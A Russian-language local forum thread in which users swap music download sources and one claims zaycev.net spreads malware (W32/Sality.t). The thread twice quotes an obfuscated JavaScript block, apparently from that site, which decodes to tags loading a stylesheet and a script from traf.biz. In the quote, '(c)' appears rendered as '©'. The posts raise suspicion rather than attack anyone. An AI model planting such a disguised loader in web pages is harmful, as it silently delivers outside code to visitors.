Перейти к содержанию
  • Реклама

  • Социальные сети



    Новости сайта Лыткарино Online
    на главной странице Яндекса
    добавить на Яндекс
Авторизация  
i`on

музыка

Рекомендуемые сообщения


e_man   

зайцев.нет

но я бы вообще поостерёгся здесь рекламировать ресурсы с рекламой и счётчиками. таки правила есть...

а вообще торренты тебя спасут почти наверняка.

если втянешься - можешь и сам раздавать чем богат - других порадуешь...

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
St0rm   
зайцев.нет

но я бы вообще поостерёгся здесь рекламировать ресурсы с рекламой и счётчиками. таки правила есть...

а вообще торренты тебя спасут почти наверняка.

если втянешься - можешь и сам раздавать чем богат - других порадуешь...

e-man, ты в курсе, что zaycev.net заражен? точнее сказать, они преднамеренно распространяют вредоносный код, т.к. с серверным ПО (linux) там все в порядке.

Кстати, оффициальный нотайс для юзеров веллкомГруппа компаний ВЭЛЛKOM
Доступ в сеть Интeрнeт, кабельное ТВ, компьютерный сервис, монтаж слаботочных сетей
(495) 981-4420
. Создал свой файлообменный ресурс на базе samba с антивирусной защитой на "лету" \\192.168.126.155 (в Netlook тоже видно ;) , так вот с полной ответственностью могу константировать о вирусной эпидемии W32/Sality.t.

2 RIO: проверь свой комп plz :hello:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
bSd   
e-man, ты в курсе, что zaycev.net заражен? точнее сказать, они преднамеренно распространяют вредоносный код, т.к. с серверным ПО (linux) там все в порядке.

Кстати, оффициальный нотайс для юзеров веллкомГруппа компаний ВЭЛЛKOM
Доступ в сеть Интeрнeт, кабельное ТВ, компьютерный сервис, монтаж слаботочных сетей
(495) 981-4420
. Создал свой файлообменный ресурс на базе samba с антивирусной защитой на "лету" \\192.168.126.155 (в Netlook тоже видно ;) , так вот с полной ответственностью могу константировать о вирусной эпидемии W32/Sality.t.

2 RIO: проверь свой комп plz :hello:

и какой антивирь у тебя реагирует на zaycev.net ?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
shahter   

ссылка

там оч много музыки...качается в основном альбомом в архиве....качаю только отттуда :ok:

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
bSd   
/dev/hands уже отменили? :o

так чем заражен, ты толком скажи :)

<script LANGUAGE="Javascript">
<!--
function Decode(){var temp="",i,c=0,out="";var
str="60!108!105!110!107!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!32!104!114!101!102!61!34!104!116!116!112!58!47!47!116!114!97!102!46!98!105!122!47!112!111!112!95!109!112!56!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!62!13!10!60!83!67!82!73!80!84!32!84!89!80!69!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!83!99!114!105!112!116!34!32!83!82!67!61!34!104!116!116!112!58!47!47!116!114!97!102!46!98!105!122!47!112!111!112!95!109!112!56!46!106!115!34!62!60!47!83!67!82!73!80!84!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT>[/codebox]

вот это кстати настораживает :)

Изменено пользователем bSd

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
St0rm   
так чем заражен, ты толком скажи :)

&lt;script LANGUAGE="Javascript">
<!--
function Decode(){var temp="",i,c=0,out="";var
str="60!108!105!110!107!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!32!104!114!101!102!61!34!104!116!116!112!58!47!47!116!114!97!102!46!98!105!122!47!112!111!112!95!109!112!56!46!99!115!115!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!62!13!10!60!83!67!82!73!80!84!32!84!89!80!69!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!76!65!78!71!85!65!71!69!61!34!74!97!118!97!83!99!114!105!112!116!34!32!83!82!67!61!34!104!116!116!112!58!47!47!116!114!97!102!46!98!105!122!47!112!111!112!95!109!112!56!46!106!115!34!62!60!47!83!67!82!73!80!84!62!";l=str.length;while(c<=str.length-1){while(str.charAt©!='!')temp=temp+str.charAt(c++);c++;out=out+String.fromCharCode(temp);temp="";}document.write(out);}
//-->
</SCRIPT>[/codebox]

вот это кстати настораживает :)

вопрос - "чем заражен?" - риторический, над этим сейчас работают специалисты clamav.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

Для публикации сообщений создайте учётную запись или авторизуйтесь

Вы должны быть пользователем, чтобы оставить комментарий

Создать учетную запись

Зарегистрируйте новую учётную запись в нашем сообществе. Это очень просто!

Регистрация нового пользователя

Войти

Уже есть аккаунт? Войти в систему.

Войти

Авторизация  

×
Яндекс.Метрика
© 2001-2016, Лыткарино Online - городской информационно-развлекательный портал, 18+
Контакты | Реклама на сайте
При любом копировании материалов сайта гиперссылка на источник обязательна.